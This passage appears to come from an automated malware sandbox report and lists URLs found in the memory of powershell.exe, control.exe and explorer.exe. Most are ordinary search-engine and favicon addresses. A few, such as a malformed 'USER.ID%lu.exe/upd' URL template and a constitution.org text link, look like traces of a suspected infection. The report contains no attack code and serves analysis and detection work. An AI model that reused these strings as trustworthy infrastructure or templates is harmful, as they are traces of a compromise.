Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000016.00000003.463966889.00000265013EA000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000016.00000002.511106004.0000026500001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 0000001F.00000000.545744038.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: powershell.exe, 00000016.00000003.463561816.000002650102F000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000016.00000003.463966889.00000265013EA000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 0000001F.00000002.604333034.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            String found in binary or memory (explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp):
            http://www.expedia.com/
            http://www.expedia.com/favicon.ico
            http://www.gismeteo.ru/favicon.ico
            http://www.gmarket.co.kr/
            http://www.gmarket.co.kr/favicon.ico
            http://www.google.co.in/
            http://www.google.co.jp/
            http://www.google.co.uk/
            http://www.google.com.br/
            http://www.google.com.sa/
            http://www.google.com.tw/
            http://www.google.com/
            http://www.google.com/favicon.ico
            http://www.google.cz/
            http://www.google.de/
            http://www.google.es/
            http://www.google.fr/
            http://www.google.it/
            http://www.google.pl/
            http://www.google.ru/
            http://www.google.si/
            http://www.iask.com/
            http://www.iask.com/favicon.ico
            http://www.kkbox.com.tw/
            http://www.kkbox.com.tw/favicon.ico
            http://www.linternaute.com/favicon.ico
            http://www.maktoob.com/favicon.ico
            http://www.mercadolibre.com.mx/
            http://www.mercadolibre.com.mx/favicon.ico
            http://www.mercadolivre.com.br/
            http://www.mercadolivre.com.br/favicon.ico
            http://www.merlin.com.pl/
            http://www.merlin.com.pl/favicon.ico
            http://www.microsofttranslator.com/?ref=IE8Activity
            http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
            http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            http://www.mtv.com/
            http://www.mtv.com/favicon.ico
            http://www.myspace.com/favicon.ico
            http://www.najdi.si/
            http://www.najdi.si/favicon.ico
            http://www.nate.com/favicon.ico
            http://www.neckermann.de/
            http://www.neckermann.de/favicon.ico
            http://www.news.com.au/favicon.ico
            http://www.nifty.com/favicon.ico
            http://www.ocn.ne.jp/favicon.ico
            http://www.orange.fr/
            http://www.otto.de/favicon.ico
            http://www.ozon.ru/
            http://www.ozon.ru/favicon.ico
            http://www.ozu.es/favicon.ico
            http://www.paginasamarillas.es/
            http://www.paginasamarillas.es/favicon.ico
            http://www.pchome.com.tw/favicon.ico
            http://www.priceminister.com/
            http://www.priceminister.com/favicon.ico
            http://www.rakuten.co.jp/favicon.ico
            http://www.rambler.ru/
            http://www.rambler.ru/favicon.ico
            http://www.recherche.aol.fr/
            http://www.rtl.de/
